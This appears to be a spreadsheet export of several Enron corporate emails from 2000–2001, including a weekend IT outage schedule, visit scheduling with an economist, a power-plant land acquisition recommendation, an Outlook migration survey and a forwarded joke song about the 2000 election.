I have NO idea.   Really.  Sincerely.  I thought I understood it, but I may have it all wrong.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dasovich, Jeff  _x000D_
Sent:	Thursday, October 25, 2001 12:34 PM_x000D_
To:	Kaufman, Paul_x000D_
Subject:	RE: Staffing_x000D_
_x000D_
I'm not interested.  But is it more, or less, than you described?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaufman, Paul  _x000D_
Sent:	Thursday, October 25, 2001 2:34 PM_x000D_
To:	Mara, Susan; Dasovich, Jeff; Comnes, Alan_x000D_
Subject:	Staffing_x000D_
_x000D_
I may have misspoken this morning when describing the package.  Please contact Rick with any questions concerning the package.  </t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 09:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 6-8-01 through 6-11-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
June 8, 2001 5:00pm through June 11, 2001 12:00am_x000D_
------------------------------------------------------------------------------_x000D_
------------------------_x000D_
_x000D_
_x000D_
ECS to ECN Network Interconnection, June 9th 2001         POSTPONED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nterconnection activities are scheduled to occur the evening of June 9th _x000D_
2001 starting from 7:00 p.m.(CT) and completing around 11:00 p.m. (CT). _x000D_
Application testing activities will begin at 11:00 p.m. (CT) once all network _x000D_
testing has completed._x000D_
_x000D_
If you have any further questions, please contact Pete Castrejana at _x000D_
713-410-0642 for more information.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_x000D_
Impact:  pdx-ad-03.ebs.enron.net [DS] Site: Portland_x000D_
Time:  Sat 6/9/2001 at  9:00:00 PM CT thru Sat 6/9/2001 at  9:15:00 PM CT_x000D_
 Sat 6/9/2001 at  7:00:00 PM PT thru Sat 6/9/2001 at  7:15:00 PM PT_x000D_
 Sun 6/10/2001 at  3:00:00 AM London thru Sun 6/10/2001 at  3:15:00 PM London_x000D_
Outage:  Increase EBS domain account password complexity_x000D_
Environments Impacted:  EBS (enron_comm) users_x000D_
Purpose: Increasing password complexity reduces the security risk for the _x000D_
CORP domain and corp security based applications._x000D_
Backout: Deinstall the password filter._x000D_
Contact(s):  Marlin Gubser    713-853-4281_x000D_
      _x000D_
Impact:  CORP_x000D_
Time:  Sat 6/9/2001 at  10:00:00 PM CT thru Sun 6/10/2001 at    1:00:00 AM CT_x000D_
 Sat 6/9/2001 at    8:00:00 PM PT  thru Sat 6/9/2001 at  11:00:00 PM PT_x000D_
 Sun 6/10/2001 at  4:00:00 AM London thru Sun 6/10/2001 at  7:00:00 AM London_x000D_
Outage:  Memory upgrade and storage relocation for server fracture._x000D_
Environments Impacted:  RMS global company OFS_x000D_
Purpose: Add memory for performance improvement.  Permanently rack D1000 disk _x000D_
array._x000D_
Backout: Restore to original configuration without memory._x000D_
Contact(s):  Malcolm Wells    713-345-3716_x000D_
 _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: _x000D_
Impact:  CORP_x000D_
Time:  Fri 6/8/2001 at  5:00:00 PM Calgary thru Sun 6/10/2001 at  12:00:00 PM _x000D_
Calgary_x000D_
 Fri 6/8/2001 at  6:00:00 PM CT thru Sun 6/10/2001 at    1:00:00 PM CT_x000D_
 Fri 6/8/2001 at  4:00:00 PM PT thru Sun 6/10/2001 at  11:00:00 AM PT_x000D_
 Sat 6/9/2001 at  12:00:00 AM London thru Sun 6/10/2001 at  7:00:00 PM London_x000D_
Outage:  Enron Canada-Calgary PBX Upgrade_x000D_
Environments Impacted:  Corp Calgary_x000D_
Purpose: To bring Enron Calgary up to Enron standards.  Allow 4 digit dialing _x000D_
between Enron Canada Corp. and Enron Direct Limited Partnership, and network _x000D_
the voicemail. Enron Calgary will be without phone service for the duration _x000D_
of the upgrade._x000D_
Backout: As a complete new cabinet "A" will be installed we will have the old _x000D_
cabinet with processor on site that can be reinstalled in the event that _x000D_
problems arise. _x000D_
Contact(s):  Brad K Martin  (403) 974-6922  (403) 212-9280_x000D_
 _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  _x000D_
Impact:  CORP_x000D_
Time:  Fri 6/8/2001 at    2:00:00 PM CT thru Mon 6/11/2001 at    2:00:00 AM CT_x000D_
 Fri 6/8/2001 at  12:00:00 PM PT thru Mon 6/11/2001 at  12:00:00 AM PT_x000D_
 Fri 6/8/2001 at 8:00:00 PM London thru Mon 6/11/2001 at  8:00:00 AM London_x000D_
Outage:  Unify Gas Migration from Sybase to SQL Server_x000D_
Environments Impacted:  Unify Users_x000D_
Purpose: Increase reliability and scalability of Unify system_x000D_
Backout: Reinstate Sybase version if insurmountable problems occur during the _x000D_
conversion weekend._x000D_
Contact(s):  Brian Ripley    713-345-4709_x000D_
  Matt Pena        713-345-4209_x000D_
  Ramesh Rao   713-349-4207 _x000D_
  Bob Ward        713-345-4409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Mon, 6 Nov 2000 02:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Your visit to Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Frank,_x000D_
_x000D_
Thanks a lot. Are you planning to make a general presentation on your work_x000D_
in the weather area? If this is the case, I would_x000D_
invite to our lunch meeting the traders from the Weather Derivatives_x000D_
desk._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Francis X. Diebold" &lt;fdiebold@sas.upenn.edu&gt; on 11/04/2000 08:47:41 AM_x000D_
To: Shirley.Crenshaw@enron.com_x000D_
cc: Vince Kaminski &lt;vkamins@enron.com&gt; _x000D_
Subject: Re: Your visit to Enron_x000D_
_x000D_
_x000D_
Shirley,_x000D_
_x000D_
The 21st is perfect.  I will go ahead and purchase my plane tickets.  Would _x000D_
you_x000D_
please make me a hotel reservation for the night of the 21st?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Frank Diebold_x000D_
_x000D_
_x000D_
_x000D_
Shirley.Crenshaw@enron.com wrote:_x000D_
_x000D_
&gt; Good morning Professor Diebold:_x000D_
&gt;_x000D_
&gt; I am Vince Kaminski's assistant and he has forwarded your emails to me_x000D_
&gt; for scheduling purpose.  Unfortunately, we have a conflict on December_x000D_
&gt; 14th.  Can you possibly come on the 21st?_x000D_
&gt;_x000D_
&gt; I hope you have not already made your reservations.  If I can do anything_x000D_
&gt; to assist you, please let me know._x000D_
&gt;_x000D_
&gt; Best regards,_x000D_
&gt;_x000D_
&gt; Shirley Crenshaw_x000D_
&gt; Administrative Coordinator_x000D_
&gt; Enron Research Group_x000D_
&gt; 713-853-5290_x000D_
&gt;_x000D_
&gt; ---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 11/03/2000_x000D_
&gt; 09:29 AM ---------------------------_x000D_
&gt;_x000D_
&gt; Vince J Kaminski_x000D_
&gt; 11/02/2000 04:30 PM_x000D_
&gt;_x000D_
&gt; To:   "Francis X. Diebold" &lt;fdiebold@sas.upenn.edu&gt; @ ENRON_x000D_
&gt; cc:   Vince J Kaminski/HOU/ECT@ECT, Shirley Crenshaw/HOU/ECT@ECT_x000D_
&gt; Subject:  Re: visit?  (Document link: Shirley Crenshaw)_x000D_
&gt;_x000D_
&gt; Frank,_x000D_
&gt;_x000D_
&gt; Dec 14   would be  better for us. We have already scheduled_x000D_
&gt; an internal presentation on December 7.  Please, go ahead and make a_x000D_
&gt; reservation._x000D_
&gt; The best place to stay is Hyatt Regency Downtown or Doubletree Downtown_x000D_
&gt; (within a walking distance to Enron). It is important to specify the_x000D_
&gt; downtown_x000D_
&gt; location for both hotels._x000D_
&gt;_x000D_
&gt; Vince_x000D_
&gt;_x000D_
&gt; "Francis X. Diebold" &lt;fdiebold@sas.upenn.edu&gt; on 11/02/2000 03:00:49 PM_x000D_
&gt;_x000D_
&gt; To:   Vince.J.Kaminski@enron.com_x000D_
&gt; cc:_x000D_
&gt; Subject:  Re: visit?_x000D_
&gt;_x000D_
&gt; Sounds good, Vince.  How about Dec 7?  The roundtrip coach fare, regardless_x000D_
&gt; of_x000D_
&gt; airline, is about $1900.  I hope that won't break the bank.  Once I have_x000D_
&gt; your_x000D_
&gt; approval, I'll go ahead and book it.  Best, Frank_x000D_
&gt;_x000D_
&gt; Vince.J.Kaminski@enron.com wrote:_x000D_
&gt;_x000D_
&gt; &gt; Frank,_x000D_
&gt; &gt;_x000D_
&gt; &gt; Yes, I would be very interested in meeting with you in Houston in_x000D_
&gt; December._x000D_
&gt; &gt; The best day for visit would be Thursday when my group has a lunch_x000D_
&gt; meeting_x000D_
&gt; &gt; and you could meet the rest of the research unit._x000D_
&gt; &gt;_x000D_
&gt; &gt; Please, let me know what day would work for you. We shall be very glad to_x000D_
&gt; &gt; cover the cost of your trip._x000D_
&gt; &gt;_x000D_
&gt; &gt; Vince_x000D_
&gt; &gt;_x000D_
&gt; &gt; I_x000D_
&gt; &gt;_x000D_
&gt; &gt; "Francis X. Diebold" &lt;fdiebold@sas.upenn.edu&gt; on 10/31/2000 01:01:11 PM_x000D_
&gt; &gt;_x000D_
&gt; &gt; To:   Vince Kaminski &lt;vkamins@enron.com&gt;_x000D_
&gt; &gt; cc:_x000D_
&gt; &gt; Subject:  visit?_x000D_
&gt; &gt;_x000D_
&gt; &gt; Hi Vince,_x000D_
&gt; &gt; Are you still interested in my visiting for a day, perhaps in Dec or_x000D_
&gt; &gt; Jan?  I have begun a project on unobserved-components modeling of_x000D_
&gt; &gt; weather patterns, so it would be productive and fun to compare notes._x000D_
&gt; &gt; Best,_x000D_
&gt; &gt; Frank_x000D_
&gt; &gt;_x000D_
&gt; &gt; --_x000D_
&gt; &gt; Francis X. Diebold_x000D_
&gt; &gt; WP Carey Professor_x000D_
&gt; &gt;_x000D_
&gt; &gt; Department of Economics_x000D_
&gt; &gt; University of Pennsylvania_x000D_
&gt; &gt; 3718 Locust Walk_x000D_
&gt; &gt; Philadelphia, PA 19104-6297_x000D_
&gt; &gt;_x000D_
&gt; &gt; fdiebold@sas.upenn.edu_x000D_
&gt; &gt; http://www.ssc.upenn.edu/~diebold_x000D_
&gt; &gt;_x000D_
&gt; &gt; (215) 898-1507  telephone_x000D_
&gt; &gt; (215) 573-4217  fax_x000D_
&gt;_x000D_
&gt; --_x000D_
&gt; Francis X. Diebold_x000D_
&gt; WP Carey Professor_x000D_
&gt;_x000D_
&gt; Department of Economics_x000D_
&gt; University of Pennsylvania_x000D_
&gt; 3718 Locust Walk_x000D_
&gt; Philadelphia, PA 19104-6297_x000D_
&gt;_x000D_
&gt; fdiebold@sas.upenn.edu_x000D_
&gt; http://www.ssc.upenn.edu/~diebold_x000D_
&gt;_x000D_
&gt; (215) 898-1507  telephone_x000D_
&gt; (215) 573-4217  fax_x000D_
_x000D_
--_x000D_
Francis X. Diebold_x000D_
WP Carey Professor_x000D_
_x000D_
Department of Economics_x000D_
University of Pennsylvania_x000D_
3718 Locust Walk_x000D_
Philadelphia, PA 19104-6297_x000D_
_x000D_
fdiebold@sas.upenn.edu_x000D_
http://www.ssc.upenn.edu/~diebold_x000D_
_x000D_
(215) 898-1507  telephone_x000D_
(215) 573-4217  fax_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 07:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'c.cole@pecorp.com', 'ben.jacoby@enron.com'})</t>
  </si>
  <si>
    <t>Torrence Acquisition (South parcel) - GM recommendation</t>
  </si>
  <si>
    <t>Recommendations:_x000D_
_x000D_
As the General Manager of the PERC/Enron Joint Power Development Program, _x000D_
Enron hereby submits its recommendations to the Management Committee for _x000D_
their consideration regarding the pending Torrence south parcel land _x000D_
acquisition decision._x000D_
_x000D_
After reviewing the relevant commercial, legal and environmental issues with _x000D_
the respective Project Managers and development personnel, Enron recommends _x000D_
that the following courses of action be undertaken:_x000D_
_x000D_
1.  PERC should notify Peoples Gas, Light &amp; Coke (PGL) on 6/16/00 that PERC _x000D_
does not intend to assume the role of Buyer as provided for in the terms of _x000D_
the land purchase Agreement executed between PGL and Air Liquide on _x000D_
4/11/2000. _x000D_
_x000D_
2.  Assuming that PGL assumes the role of Buyer under the terms of the land _x000D_
purchase Agreement executed between PGL and Air Liquide on 4/11/2000 and PGL _x000D_
proceeds to the scheduled 6/26/00 closing, PERC and Enron should continue _x000D_
their due diligence and development activities on the Torrence south parcel.  _x000D_
Upon establishment of a proposed budget and schedule, these activities should _x000D_
be focused on achieving the goals of minimizing out-of-pocket development _x000D_
expenses and implementing prudent risk mitigation strategies on behalf of _x000D_
PERC and Enron._x000D_
_x000D_
3.  Assuming that PGL assumes the role of Buyer under the terms of the land _x000D_
purchase Agreement executed between PGL and Air Liquide on 4/11/2000 and PGL _x000D_
plans to proceed to the scheduled 6/26/00 closing, PERC and PGL should _x000D_
immediately begin preparation of the documents necessary to achieve the ICC _x000D_
approval of any future transfer (sale,lease, or alternative structure) of the _x000D_
Torrence south parcel from PGL to Torrence Power LLC._x000D_
_x000D_
_x000D_
Other Issues/Risks:_x000D_
_x000D_
1.  This recommendation is based upon the belief that although the Torrence _x000D_
south parcel does hold potential value to PERC and Enron as a project _x000D_
development site, the overall viability and risk/reward profile of the _x000D_
commercial opportunity has not yet been sufficiently finalized.  _x000D_
_x000D_
The potential sources of value associated with this site are listed below:_x000D_
_x000D_
 a. The site/project currently hold a priority position in the ComEd _x000D_
interconnection queue._x000D_
 b. The site (in combination with the Calumet project) captures the majority _x000D_
of available interconnection capability (500-600 MW) in the Calumet region of _x000D_
the ComEd system.  This would force competing IPP projects (i.e. Wizvest) to _x000D_
bear the financial burden of ComEd system upgrade costs._x000D_
 c. The site (in combination with the Calumet project) represents an integral _x000D_
component of developing a commercial solution to the Mission Energy/ComEd 500 _x000D_
MW "in-city" regulatory obligation to the city of the Chicago._x000D_
 d. The site represents one of the unique in-city sites capable of supporting _x000D_
a power project from a zoning, fuel supply, and transmission perspective._x000D_
_x000D_
The factors contributing to the recommendation for PERC and Enron not to _x000D_
proceed to closing on 6/26/00 are listed below:_x000D_
_x000D_
 a. The existence of known environmental contamination and the liabilities _x000D_
associated with entering the chain of title on the Torrence south parcel._x000D_
 b. The indemnification language contained within the land purchase Agreement _x000D_
executed between PGL and Air Liquide on 4/11/2000._x000D_
 c. The incomplete status of the overall commercial development opportunity _x000D_
associated with the Torrence south parcel._x000D_
 d. PERC and Enron's desire to maintain the flexibility to minimize _x000D_
development costs while further developing the commercial development _x000D_
opportunity and associated value proposition prior to executing an _x000D_
ICC-approved land transfer from PGL to Torrence Power LLC._x000D_
_x000D_
_x000D_
2.  It is PERC and Enron's understanding that PGL plans to proceed to the _x000D_
closing on 6/26/00 and assume the role of Buyer under the terms of the land _x000D_
purchase Agreement executed between PGL and Air Liquide on 4/11/2000.  _x000D_
_x000D_
3.  The south parcel represents a potential power plant development project _x000D_
site upon which PERC and Enron will continue to conduct due diligence and _x000D_
development activities.  The site is currently being evaluated as a candidate _x000D_
for a 6 x LM 6000 facility with either an '01 or '02 in-service date._x000D_
_x000D_
4.  PERC and Enron have decided that it would not be prudent for either of _x000D_
their respective organizations to assume any form of environmental liability _x000D_
associated with the Torrence south parcel. PERC and Enron shall work to _x000D_
develop risk mitigation strategies including land options, environmental _x000D_
indemnifications, and other structures which protect their respective assets _x000D_
and the overall economic viability of a development project on the Torrence _x000D_
south parcel._x000D_
_x000D_
5.  A potential risk associated with the above recommendations is that the _x000D_
time required to complete the ICC approval process necessary to transfer the _x000D_
Torrence south parcel from PGL to Torrence Power LLC.  PERC development _x000D_
personnel have estimated that the ICC approval process could require up to 6 _x000D_
months (The transfer of the Calumet parcel was "fast-tracked" and took 3 _x000D_
months to achieve ICC approval).  This risk could impact the viability of an _x000D_
'01 in-service date for a Torrence Power LLC development project.  PERC and _x000D_
Enron will work to minimize the impact of this risk._x000D_
_x000D_
6.  PERC and Enron shall work to develop a binding agreement which specifies _x000D_
an approval and cost-sharing mechanism for future development decisions on _x000D_
the Torrence south parcel.  Such an agreement shall also specify a formula _x000D_
for the sharing of proceeds associated with the marketing/selldown strategy _x000D_
currently under development by PERC and Enron for all of the Chicago _x000D_
development projects._x000D_
_x000D_
_x000D_
Feel free to contact me if you have any questions or wish to discuss the _x000D_
above recommendations and information._x000D_
_x000D_
Fred Mitro_x000D_
General Manager</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 12:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mona.l.petrochko@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'neil_carpino@enron.net', 'gunnar_frey@enron.net', 'fred_enochs@enron.net', 'nicole_la@enron.net'})</t>
  </si>
  <si>
    <t>Primary Contacts for ILECs</t>
  </si>
  <si>
    <t>We have reorganized Government Affairs primary points of contact for the_x000D_
ILECs for purposes of interconnection and special access.  While all of us_x000D_
are willing to field questions, this is just for your information in_x000D_
facilitate communications going forward._x000D_
_x000D_
Lara Leibman-Verizon_x000D_
Scott Bolton-Qwest_x000D_
Me and John Neslage-SBC and Bell South_x000D_
_x000D_
As I understand the break-out for the trading desk,_x000D_
_x000D_
Gunnar Frey-Verizon, Bell South_x000D_
Neil Carpino-Qwest and SBC-West (Pacific Bell and Nevada Bell)_x000D_
Nicole La-SBC (Ameritech and Texas)_x000D_
_x000D_
Please let me know if I have the break-out correct.  Thanks.</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 03:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ccampbel@tosco.com', 'jennmmyers@hotmail.com', 'sroy@vistacreek.com', 'bonuraj@phelps.com', 'eric.bass@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: gore went down to georgia</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Shanna Husser/HOU/EES on 11/28/2000 11:55 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Christina Barthel_x000D_
11/28/2000 11:53 AM_x000D_
To: "Amber" &lt;avs99@hotmail.com&gt;, "Meredith" &lt;meredith@friersoncpa.com&gt;, _x000D_
"Lindsey Brewer" &lt;lynzag01@hotmail.com&gt;, "Erin" &lt;elaggie99@hotmail.com&gt;, _x000D_
"Kelly Kohrman" &lt;pyrowoman@hotmail.com&gt;, "Jose" _x000D_
&lt;jose.a.suarez@us.pwcglobal.com&gt;, "Albert" &lt;albert.r.ferrel@exxon.com&gt;, _x000D_
"Oscar " &lt;oscgarcia@notes.primeco.com&gt;, Lynna Kacal/Corp/Enron@ENRON, Amy _x000D_
Jon/HOU/ECT@ECT, Kathy Fink/Corp/Enron@ENRON, Shanna Husser/HOU/EES@EES, _x000D_
Rafael Avila/HOU/EES@EES, Angie Ramirez/HOU/EES@EES, Chris _x000D_
Ochoa/NA/Enron@Enron, Stacy Gibson/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: gore went down to georgia_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Christina Barthel/HOU/EES on 11/28/2000 _x000D_
11:48 AM ---------------------------_x000D_
_x000D_
_x000D_
Lindsay Warlick &lt;lindsay.warlick@tamut.edu&gt; on 11/28/2000 11:26:50 AM_x000D_
To: tobwat@aol.com, Pam Barron &lt;pam.barron@tamut.edu&gt;, debkbar217@aol.com, _x000D_
rdbar021475@aol.com, melb2730@aol.com, mb32978@aol.com, _x000D_
brookiesmommy@aol.com, christina.barthel@enron.com, tara.ridge@ipaper.com_x000D_
_x000D_
_x000D_
AL GORE WENT DOWN TO FLORIDA_x000D_
_x000D_
Al Gore went down to Florida He was lookin' for an election to steal._x000D_
He was in a bind Cause he was way behind, And he was willin' to cut a_x000D_
deal. When he came across a Gov'ner Knawin' on a victory and chewin' hard,_x000D_
Veep Gore jumped up on a hickory stump and said, "Gov, let me tell you what"_x000D_
_x000D_
"I bet you didn't know it but I'm a contender in Florida too, and if you_x000D_
care to take a dare, I'll make a bet with you._x000D_
Now you ran a good campaign down here, but give Al Gore his due._x000D_
I'll bet a nation of gold and the white house it holds, that I got more_x000D_
votes than you!"_x000D_
_x000D_
The gov'ner said, "My names Dubya and it might be a sin....  But I'll_x000D_
take that bet, you're gonna regret, cause this Texan always wins"_x000D_
_x000D_
(Chorus)_x000D_
_x000D_
Dubya rally up your troops and fight for that vote hard.  Cause Al_x000D_
Gore's loose in Florida and Bill Daley holds the cards.  If you win you get_x000D_
that shiny nation, made of gold, but if you lose, then Al Gore gets con-trol._x000D_
_x000D_
Al Gore opened up his mouth and said "I'll start this show"_x000D_
And fire burned in the eyes of lawyers, who knew they'd make some dough._x000D_
And he pulled his hand across his lips, and he made an evil grin._x000D_
Then in walked all the Palm Beach voters, Dubya's chances were lookin'_x000D_
thin._x000D_
_x000D_
(Guitar/bass solo)_x000D_
_x000D_
When Al Gore finished, Dubya said...  "Well, your pretty good ol' son._x000D_
Now plant your butt in that chair right there and let me show you how it's_x000D_
done!"_x000D_
_x000D_
(Chorus II)_x000D_
_x000D_
Dems in the orange groves, Run George, Run.  You can't lose now in the _x000D_
land of the sun.  Your dads on your side and your brothers' in tow, Gore in _x000D_
the White_x000D_
House, God, Please NO!_x000D_
_x000D_
(Fast Fiddle/Guitar solo)_x000D_
_x000D_
AL Gore bowed his head because he knew that he'd been beat._x000D_
He conceded that golden nation on the Ground at Dubya's feet._x000D_
Dubya said, "Gore, just come on back if ya ever wanna try again, cause I_x000D_
told you once you tree huggin' dunce, this Texan always wins!"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;&gt;&gt;Carl Greig_x000D_
&gt;&gt;&gt;Career and Special Services Coordinator_x000D_
&gt;&gt;&gt;Texas A&amp;M University-Texarkana_x000D_
&gt;&gt;&gt;P.O. Box 5518_x000D_
&gt;&gt;&gt;Texarkana, TX 75505_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;phone: 903-223-3062_x000D_
&gt;&gt;&gt;fax: 903-832-8890_x000D_
&gt;&gt;&gt;email: carl.greig@tamut.edu_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;http://www.tamut.edu_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'davila1@txu.com', 'ggreen2@txu.com', 'cstone1@txu.com', 'kenenglish@txu.com', 'gary.a.hanks@enron.com', 'daren.j.farmer@enron.com', 'ami.chokshi@enron.com', 'earl.tisdale@enron.com'})</t>
  </si>
  <si>
    <t>HPL Nom for October 25, 2000</t>
  </si>
  <si>
    <t>(See attached file: HPLN1025.xls)_x000D_
_x000D_
 - HPLN1025.xls</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 06:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Outlook Migration Team@ENRON_x000D_
05/14/2001 01:26 PM_x000D_
To: V Charles Weldon/HOU/ECT@ECT, Ed McMichael/HOU/ECT@ECT, Eric _x000D_
Boyt/Corp/Enron@Enron, Eric Moon/HOU/ECT@ECT, Geraldine Irvine/HOU/ECT@ECT, _x000D_
Jin Guo/HOU/ECT@ECT, Louis Dicarlo/NA/Enron@ENRON, Maria Garza/HOU/ECT@ECT, _x000D_
Mark Breese/HOU/ECT@ECT, Sandy Olitsky/HOU/ECT@ECT, Santiago _x000D_
Garcia/NA/Enron@Enron, Steven Curlee/Corp/Enron@Enron, Alexandra _x000D_
Villarreal/NA/Enron@ENRON, Andrea Ring/HOU/ECT@ECT, Brad McKay/HOU/ECT@ECT, _x000D_
Chris Germany/HOU/ECT@ECT, Scott Hendrickson/HOU/ECT@ECT, Eric _x000D_
Thode/Corp/Enron@ENRON, Jennifer Walker/NA/Enron@Enron, Judy _x000D_
Townsend/HOU/ECT@ECT, Kathie Grabstald/HOU/ECT@ECT, Kimberly _x000D_
Bates/HOU/ECT@ECT, Mark Koenig/Corp/Enron@ENRON, Peter F Keavey/HOU/ECT@ECT, _x000D_
Rebecca Ford/HOU/ECT@ECT, Sandra F Brawner/HOU/ECT@ECT, Scott _x000D_
Goodell/Corp/Enron@ENRON, Scott Neal/HOU/ECT@ECT, Sean _x000D_
Boyle/Corp/Enron@ENRON, Susan W Pereira/HOU/ECT@ECT, Victoria _x000D_
Versen/HOU/ECT@ECT, Vladi Pimenov/NA/Enron@Enron, Craig Taylor/HOU/ECT@ECT, _x000D_
David Jones/NA/Enron@ENRON, Frank W Vickers/NA/Enron@Enron, Gil _x000D_
Muhl/Corp/Enron@ENRON, John Hodge/Corp/Enron@ENRON, Maureen _x000D_
Smith/HOU/ECT@ECT, Nelson Ferries/Corp/Enron@ENRON, Phil _x000D_
DeMoes/Corp/Enron@ENRON, Robin Barbe/HOU/ECT@ECT, Ruth Concannon/HOU/ECT@ECT, _x000D_
Tammi DePaolis/Corp/Enron@ENRON, Daniel Lisk/NA/Enron@Enron, Hillary _x000D_
Mack/Corp/Enron@Enron, Jan Sutherland/NA/Enron@ENRON, Jason _x000D_
Wolfe/NA/Enron@ENRON, Shannon Groenewold/ENRON@enronXgate, Shelly _x000D_
Mendel/NA/Enron@ENRON, Stacey J Brewer/HOU/ECT@ECT, Suzanne _x000D_
Christiansen/HOU/ECT@ECT, Ted Evans/NA/Enron@ENRON, Dina _x000D_
Snow/Corp/Enron@Enron, Kay Young/HOU/ECT@ECT, Lance _x000D_
Schuler-Legal/HOU/ECT@ECT, Vineet Arora/NA/Enron@ENRON, Beth A _x000D_
Ryan/HOU/ECT@ECT, Bill Berkeland/Corp/Enron@Enron, David A _x000D_
Terlip/Corp/Enron@Enron, Doug Leach/HOU/ECT@ECT, Marc De La _x000D_
Roche/HOU/ECT@ECT, Randal Maffett/HOU/ECT@ECT, Tushar Dhruv/Corp/Enron@Enron, _x000D_
Yolanda Cordova-Gilbert/HOU/ECT@ECT, Amy Villasenor/OTS/Enron@Enron, Debra _x000D_
Young/OTS/Enron@Enron, Jeff Arnold/OTS/Enron@ENRON, John _x000D_
Reese/FGT/Enron@ENRON, Josh Mayes/OTS/Enron@Enron, Larry _x000D_
Fenstad/OTS/Enron@ENRON, Mark Adleman/OTS/Enron@ENRON, Mary Ann _x000D_
Johnson/OTS/Enron@ENRON, Mary Lynne Dix/OTS/Enron@Enron, Mike _x000D_
Thomas/OTS/Enron@Enron, Morris Brassfield/OTS/Enron@ENRON, Rinetia _x000D_
Turner/OTS/Enron@Enron, Robert Geheb/OTS/Enron@Enron, Ruthann _x000D_
Frausto/OTS/Enron@ENRON, Tyrone Brown/OTS/Enron@ENRON_x000D_
cc:  _x000D_
Subject: 2- SURVEY/INFORMATION EMAIL 5-17-01_x000D_
_x000D_
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Double Click on document to put it in "Edit" mode. When you finish, _x000D_
simply click on the 'Reply With History' button then hit 'Send'  Your survey _x000D_
will automatically be sent to the Outlook 2000 Migration Mailbox._x000D_
_x000D_
Thank you._x000D_
_x000D_
Outlook 2000 Migration Team_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--------------------------------------------------------------_x000D_
_x000D_
Full Name:        Andrea Ring  _x000D_
_x000D_
Login ID:  hulahoop1_x000D_
_x000D_
Extension:  35775_x000D_
_x000D_
Office Location:  3223E_x000D_
_x000D_
What type of computer do you have?  (Desktop,  Laptop,  Both)  Desktop_x000D_
_x000D_
Do you have a PDA?  If yes, what type do you have:   (None, IPAQ, Palm Pilot, _x000D_
Jornada)  No_x000D_
_x000D_
Do you have permission to access anyone's Email/Calendar?  No_x000D_
    If yes, who?  _x000D_
_x000D_
Does anyone have permission to access your Email/Calendar?  No_x000D_
    If yes, who?  _x000D_
_x000D_
Are you responsible for updating anyone else's address book?  No_x000D_
    If yes, who?  _x000D_
_x000D_
Is anyone else responsible for updating your address book?  No_x000D_
    If yes, who?  _x000D_
_x000D_
Do you have access to a shared calendar?  No_x000D_
    If yes, which shared calendar?  _x000D_
_x000D_
Do you have any Distribution Groups that Messaging maintains for you (for _x000D_
mass mailings)? No_x000D_
    If yes, please list here:  _x000D_
_x000D_
Please list all Notes databases applications that you currently use:  Mailbox_x000D_
_x000D_
In our efforts to plan the exact date/time of your migration, we also will _x000D_
need to know:_x000D_
_x000D_
What are your normal work hours?  From: 7:00am     To:   5:00pm   _x000D_
_x000D_
Will you be out of the office in the near future for vacation, leave, etc?  No_x000D_
       If so, when?        From (MM/DD/YY):      To (MM/DD/YY):      _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 06:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mitch.robinson@enron.com', 'john.moore@enron.com'})</t>
  </si>
  <si>
    <t>BPUB</t>
  </si>
  <si>
    <t xml:space="preserve">Anything else for the term sheet?  Feel free to add it and return to me._x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'jalexander@gibbs-bruns.com', 'linda.noske@enron.com', 'stephanie.miller@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'phillip.allen@enron.com', 'steve.walton@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'barry.tycholiz@enron.com', 'don.black@enron.com', 'christi.nicolay@enron.com', 'robert.frank@enron.com', 'susan.mara@enron.com', 'leslie.lawner@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>Reuters -- FERC told Calif natgas to reach limit this summer</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
---------------------- Forwarded by Rebecca W Cantrell/HOU/ECT on 05/25/2001 _x000D_
09:46 AM ---------------------------_x000D_
